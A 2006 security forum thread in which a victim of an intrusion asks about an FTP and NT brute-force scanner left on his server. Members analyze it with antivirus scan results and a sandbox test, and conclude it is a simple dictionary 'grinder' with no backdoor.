Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: FTP and NT Scanner by Lomax

  1. #1
    Junior Member
    Join Date
    May 2006
    Posts
    11

    Question FTP and NT Scanner by Lomax

    Does anyone know the details of how this program attempts to connect to a computer? Someone was able to access my terminal services server through local account and upload this program. In reviewing security event logs, I see that they did attempt to gain access to my network but were apparently unable to do so. I ran the tool to see what information they were likely working with and notice is that it doesn't seem to attempt domain logins, only local machine logins? I want to make sure I'm understanding the tool right so that I thoroughly examine the extent of their probable access.

  2. #2
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    No one here can put this puzzle together for you without:

    a) fully understanding your environment.
    b) analyzing all logs
    c) understanding your business process
    d) understanding what the software does that has compromised your host/network.

    That said, the only "Lomax" I'm familiar with is Paul Lomax, who writes books for O'Reilly.

    Can you provide a link to the software in question? At very least we can tell you what the software does and you can take it from there.

    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  3. #3
    Junior Member
    Join Date
    May 2006
    Posts
    11
    Thanks for responding TH13. I suppose I wasn't clear in my questions. I know how the attacker gained access to my terminal server so I'm not so concerned about that part. He left the scanner I mentioned, though, and I was hoping someone knew the program and could give me more indepth info on its workings.

    When I ran the tool (it's a CLI from a command prompt), it showed the name of the program as "FTP and NT Scanner by Lomax (credits Inode (inode@wayeth.eu.com))." You can go to the site and see that the author took his tools off the web because they were being used for cracking. The tool seems pretty simple in that it tries to connect to computers within a given ip range using a brute force method. There is a username file and password file that it uses for determining a working login. But it seems to only attempt to log on to a machine's local account and not the domain. I just figured someone in the antionline community would be familiar with the tool and could confirm my suspicions of the program's workings or learn more about its capabilities. No big deal if there is not, though, as I'm confident that I've plugged the weak spot that was used to compromise my system. Thanks anyways.

  4. #4
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    While I'm not familiar with this specific tool, I'm VERY familiar with others that do the same thing. It sounds by your description that this is a simple "grinder" tool. My guess is that it also uses that static PW list against the standard TCP port for FTP (21).

    Any chance you can zip up the tool and attach it here? If not, the size of the PW file alone will tell me how dangerous (or not) this is. If not, I can arrange for upload out of band.

    Thanks.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  5. #5
    Junior Member
    Join Date
    May 2006
    Posts
    11
    Here's the tool. I'd say you're right about the way it works. What I'm not sure of is if it is just checking port 21 or any other ports (by default or by command). Take a look and let me know what you think.

  6. #6
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Well, this is possibly a start:

    Antivirus Version Update Result
    AntiVir 6.35.0.21 07.09.2006 no virus found
    Authentium 4.93.8 07.07.2006 no virus found
    Avast 4.7.844.0 07.07.2006 no virus found
    AVG 386 07.07.2006 no virus found
    BitDefender 7.2 07.09.2006 no virus found
    CAT-QuickHeal 8.00 07.07.2006 no virus found
    ClamAV devel-20060426 07.07.2006 no virus found
    DrWeb 4.33 07.09.2006 no virus found
    eTrust-InoculateIT 23.72.64 07.09.2006 no virus found
    eTrust-Vet 12.6.2291 07.07.2006 no virus found
    Ewido 3.5 07.09.2006 no virus found
    Fortinet 2.77.0.0 07.09.2006 suspicious
    F-Prot 3.16f 07.07.2006 no virus found
    F-Prot4 4.2.1.29 07.07.2006 no virus found
    Ikarus 0.2.65.0 07.07.2006 no virus found
    Kaspersky 4.0.2.24 07.09.2006 no virus found
    McAfee 4802 07.07.2006 Tool-LoScan
    Microsoft 1.1481 07.09.2006 no virus found
    NOD32v2 1.1651 07.08.2006 no virus found
    Norman 5.90.23 07.07.2006 no virus found
    Panda 9.0.0.4 07.09.2006 no virus found
    Sophos 4.07.0 07.09.2006 no virus found
    Symantec 8.0 07.09.2006 no virus found
    TheHacker 5.9.8.170 07.07.2006 no virus found
    UNA 1.83 07.08.2006 no virus found
    VBA32 3.11.0 07.09.2006 no virus found
    VirusBuster 4.3.7:9 07.08.2006 no virus foun

    So Fortinet didn't like the look of it amd McAfee thinks that it is "Tool-LoScan" I would go to the McAfee site and check up what they have about that in their malware library.




  7. #7
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    I will run this tool in a sandbox tomorrow when I get to the office. I will see if it does any sneaky backdoor stuff too. Stay tuned.

    Thanks.

    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  8. #8
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    It's probably based on the source found here (only available though google cache as the original site took it offline) modified to make it run on Windows (cygwin). Looks like a plain FTP dictionary scanner. It probably used the "users" file for usernames and "pass" for passwords.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  9. #9
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    Yep, after some testing this is a vanilla grinder app. It uses the dictionary that comes with it to grind FTP servers and windows local accounts. No backdoors, etc.


    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  10. #10
    Junior Member
    Join Date
    May 2006
    Posts
    11
    Thanks guys, I really appreciate it!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •